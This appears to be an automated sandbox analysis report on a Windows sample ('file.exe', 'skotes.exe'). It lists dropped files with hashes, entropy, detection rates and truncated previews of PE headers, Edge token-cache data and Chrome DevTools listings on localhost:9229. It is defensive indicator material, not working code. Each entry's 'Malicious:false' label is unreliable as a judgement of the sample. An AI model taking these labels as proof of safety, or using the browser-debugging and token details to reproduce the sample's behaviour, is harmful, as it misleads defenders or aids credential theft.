                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2278
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.848927405015187
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKxrgxmJxl9Il8ubUJqVEdj2A12Jsoa9Cujd1rc:m19YSJq8jJd9CuE
                                                                                                                                                                                                                                                                                                                    MD5:C6A3CADE30A9145588A232B639CBAD68
                                                                                                                                                                                                                                                                                                                    SHA1:A93AC26AD0636E53E55032F691F7948FF84FD61C
                                                                                                                                                                                                                                                                                                                    SHA-256:8FABFF1169120959F83DCA5F9F6A8CEF686A54C50C8C89E1A47151EFB982E610
                                                                                                                                                                                                                                                                                                                    SHA-512:34FC8EF1068BA0E06B9CB286EC66E83ABFFF9F82D43385FA5A0F0CBC22E41C0448015132EE7A8A98F33E418814D703147E5243C29F109EC901919B22F279CA89
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.s.M.A.r.p.A.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.w.2.u.8.G.L.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):4622
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.999891886162131
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:96:dYSrY0yEdn/uFNFndmiXvHFBOOCjt2ZaO:dRyEV/ueEHFEOw2ZaO
                                                                                                                                                                                                                                                                                                                    MD5:8BBDDC6DF208F4C8ABA6CD3D931FB1EA
                                                                                                                                                                                                                                                                                                                    SHA1:BD1E85EF079F6F907A7D9434CC87C6B5FAE2DDA1
                                                                                                                                                                                                                                                                                                                    SHA-256:1E1A51D40FF646E260A46596706A66D07651E67AFE28FE85F82128CFEC982661
                                                                                                                                                                                                                                                                                                                    SHA-512:576685B5F19126831E5D7B0D23463D9243B529C5A522823646CE93DC358EA301D0973E46E0FF68D848F8CECFBEF7BE95967154E69515478C8795FBF1A0E8B796
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.f.n.T.5.7.F.A.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.w.2.u.8.G.L.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2684
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.89909183171097
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKx68Wa7xC+Jxl9Il8ubUXYY0Ivm5fKOq3stBk78yPnJMc9MzlDbM1d/vc:arYSXYY0Q++3l8yPnJMMM1bn
                                                                                                                                                                                                                                                                                                                    MD5:E067DA7629F2BBECBA786F3AD83D7DAB
                                                                                                                                                                                                                                                                                                                    SHA1:27973CDF52195DDB32694884726DC2E48C3DF015
                                                                                                                                                                                                                                                                                                                    SHA-256:C43DF19A9C60312C34F796B4F540E570DFC5FC772D733CE9ADF896EC8E4092B3
                                                                                                                                                                                                                                                                                                                    SHA-512:82903FFA0E83918E41FB2011F43DB0933B4A4E3047A2CC04007E215F1CE6DB666B33B537E448DCEA655854A6E8E3C480C5589436AE41CB944D027D2ED3258511
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".P.r.J.l.F.4.N.f.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.w.2.u.8.G.L.
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                    Size (bytes):23380969
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.734800858158476
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:393216:mSatYjL2Vmd6mOc/eE7G99XtIqcjhA3QV:mSaijyVmdUuYt7+N
                                                                                                                                                                                                                                                                                                                    MD5:719DCF184F232C140A40A69F05AE2AE7
                                                                                                                                                                                                                                                                                                                    SHA1:AC1E40DAF79114C78CA756F2CFE5619CD2804CC2
                                                                                                                                                                                                                                                                                                                    SHA-256:5B5856719E14B1DCF6297E51E69B147263A72203E2F7BC5D938AE41F01312270
                                                                                                                                                                                                                                                                                                                    SHA-512:36EC8A14EE9F579F221662F29F08882F6F9DC59637100A99BC782CDDBDF3AA1C27925CA5FF94E7B3E52E092A789104713E781226050466841D01CC04960BF2A5
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d....;Fg.........."......6...T................@..........................................`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):3500
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.386181594188604
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:96:6NnQyHQMNnQ8TbQ86NnQI9QYNnQRdgEQJNnQRpkQRnNnQ4DQ+NnQowQkNnQa3QR:6NbNRp6NBNwgNKN9BN/gN2
                                                                                                                                                                                                                                                                                                                    MD5:4A672FB8C824500D3A6A6CD153045C51
                                                                                                                                                                                                                                                                                                                    SHA1:EB9406A6BCA0EA3AE29E4F19CA116D2456B0C7E8
                                                                                                                                                                                                                                                                                                                    SHA-256:7D2E9F854E751790B9E08D953DF5E466FA2F043B6ECF4943FE12D29A0BFA50D2
                                                                                                                                                                                                                                                                                                                    SHA-512:7611B634576BEE01D7C1D0206D8817879CD6C9174B71D4C742A87DCF2FA444E24C7AD67E556C2622A4A899C53D93D6AD5E4F097B018BB96C4DF914D3CA8C4871
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/CE6DF45A8DA960A14F765FBF71257AB2",.. "id": "CE6DF45A8DA960A14F765FBF71257AB2",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/CE6DF45A8DA960A14F765FBF71257AB2"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/877CFD9EFE100DDBE97B9031D9CA9B70",.. "id": "877CFD9EFE100DDBE97B9031D9CA9B70",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/877CFD9EFE100DDBE97B9031D9CA9B70"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1787
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.37291963758161
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:SfNaoQuW39TEQuDfNaoQSFQS4fNaoQZQLfNaoQ9JN0UrU0U8Q9n:6NnQuW39TEQu7NnQSFQSENnQZQjNnQ9u
                                                                                                                                                                                                                                                                                                                    MD5:CDF3AD155ED616EA5BA487863E742B63
                                                                                                                                                                                                                                                                                                                    SHA1:D8A1A239ADE66E069634EA73395F3DE6464E10DF
                                                                                                                                                                                                                                                                                                                    SHA-256:06F37A68DCB76C7EDE018549ECFDAE4904A678826F140F8E8FA6496F07E0CC46
                                                                                                                                                                                                                                                                                                                    SHA-512:91171F93E347D63D93D8C3D00F78E38A014E97083FEF18F860EEBD45649ED5448162ECB1A24F6447D1CF5BA7D24AE0F5613D019F0A1597DA7E60E158AA843B6A
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/D925073A3A23E00BAFA88A7C22771048",.. "id": "D925073A3A23E00BAFA88A7C22771048",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/D925073A3A23E00BAFA88A7C22771048"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/20EE9C610A2BB633CB5F656B4CE5C834",.. "id": "20EE9C610A2BB633CB5F656B4CE5C834",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/20EE9C610A2BB633CB5F656B4CE5C834"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):608080
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):450024
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1947648
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.950008158846607
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:kxjt3XoWPCffcrq4+mGRpxe+mHg7OwhW3mtu90feqNB9ULK+Ea:iVomCffCGmGRnetcTEckNqNcK+Ea
                                                                                                                                                                                                                                                                                                                    MD5:FA098B363F56394EB669A96201D3521D
                                                                                                                                                                                                                                                                                                                    SHA1:76ECC170B800C1EC06E738A7B5E36E71233F8F2A
                                                                                                                                                                                                                                                                                                                    SHA-256:40FC948CD1A58CB92A7A43D066FD250EF34AD52984EFB82950C20BD60E7CF21F
                                                                                                                                                                                                                                                                                                                    SHA-512:0C16D78AB94169F9B82DBBE5FABBA0A1B4D8DC7294BB8CD7186334CD9E324A1B09D12BC40C10E661101247F85FDAE1C1A409750D4D906B1A54EC59B9A030B66F
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................L...........@...........................M...........@.................................W...k.......D.....................L...............................L..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..+.........................@...aqmlcjde.....02.....................@...yinsocgv......L.....................@....taggant.0....L.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):257872
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):80880
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
